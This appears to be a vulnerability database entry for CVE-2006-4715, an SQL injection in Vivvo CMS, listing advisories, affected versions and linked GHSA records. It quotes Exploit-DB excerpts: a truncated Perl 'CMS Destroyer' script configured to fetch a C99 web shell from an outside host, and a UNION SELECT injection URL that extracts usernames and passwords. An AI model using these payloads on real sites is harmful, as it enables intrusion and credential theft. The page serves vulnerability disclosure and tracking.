CVE-2006-4715
Published 2006-09-12
Priority P3 · 39 · high · 7.5 CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS 2.56% (83.1th percentile)
SQL injection vulnerability in pdf_version.php in SpoonLabs Vivvo Article Management CMS (aka phpWordPress) 3.2 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| spoonlabs | vivvo_article_management_cms | <= 3.25 | — |
| spoonlabs | vivvo_article_management_cms | — | — |
| spoonlabs | vivvo_article_management_cms | — | — |
GHSA
GHSA-j59f-g7rp-mm5g: SQL injection vulnerability in pdf_version
ghsa_unreviewed·2022-05-01
CVE-2006-4715 [HIGH] GHSA-j59f-g7rp-mm5g: SQL injection vulnerability in pdf_version
GHSA
GHSA-hgq5-c9r4-vxm9: SQL injection vulnerability in rss/show_webfeed
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-0574 [HIGH] GHSA-hgq5-c9r4-vxm9: SQL injection vulnerability in rss/show_webfeed
SQL injection vulnerability in rss/show_webfeed.php in SpoonLabs Vivvo Article Management CMS (aka phpWordPress) 3.40 allows remote attackers to execute arbitrary SQL commands via the wcHeadlines parameter, a different vector than CVE-2006-4715. NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
No detection rules found.
Exploit-DB
Vivvo CMS 3.4 - Multiple Vulnerabilities
exploitdb·2008-10-19
CVE-2007-3939 Vivvo CMS 3.4 - Multiple Vulnerabilities
---
#!/usr/bin/perl
#Vivvo CMS Destroyer
#[email protected]
#By Xianur0
#-------------CREDITS-------------
#http://milw0rm.com/exploits/4192
#http://milw0rm.com/exploits/3326
#http://milw0rm.com/exploits/2339
#http://milw0rm.com/exploits/2337
#-------------/CREDITS-------------
print "\n Vivvo CMS Destroyer By Xianur0\n";
#-----------CONFIG----------
$SHELL='http://y4m15p33dy.vilabol.uol.com.br/c99.txt';
$textshell = 'C99Shell v.';
#----------/CONFIG----------
use LWP::UserAgent;
use Switch;
my $path = $ARGV[0];
$path = shift || &uso;
sub uso { print "\nUse: vivvo.pl [URI to Vivvo CMS]\n"; exit;}
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17");
$req = HTTP::Request->
Exploit-DB
Vivvo Article Manager 3.2 - 'id' SQL Injection
exploitdb·2006-09-09
CVE-2006-4715 Vivvo Article Manager 3.2 - 'id' SQL Injection
---
############################################################
#MercilessTurk [email protected]
############################################################
#App Name: phpWordPress (Vivvo Article Manager)
#App Author: vivvo.net
#App Version: <=3.2
############################################################
#Vulnerable Code in pdf_version.php :
#line 19: $aid=secure_sql($_GET['id']);
#line 20: $query="SELECT * from tblArticles where id=$aid";
#secure_sql function doesn't block all sql injection attacks.
############################################################
#You will need a pdf reader.
#SQL Injection String:
#http://[target]/[path]/pdf_version.php?id=-1%20UNION%20SELECT%201,2,3,password,5,6,username,8,9,10,11,12,13,14,15,16,17,18
No writeups or analysis indexed.
http://secunia.com/advisories/21855
http://securitydot.net/xpl/exploits/vulnerabilities/articles/1464/exploit.html
http://www.securityfocus.com/bid/19934
http://www.vupen.com/english/advisories/2006/3548
https://exchange.xforce.ibmcloud.com/vulnerabilities/28833
https://www.exploit-db.com/exploits/2337
Published: 2006-09-12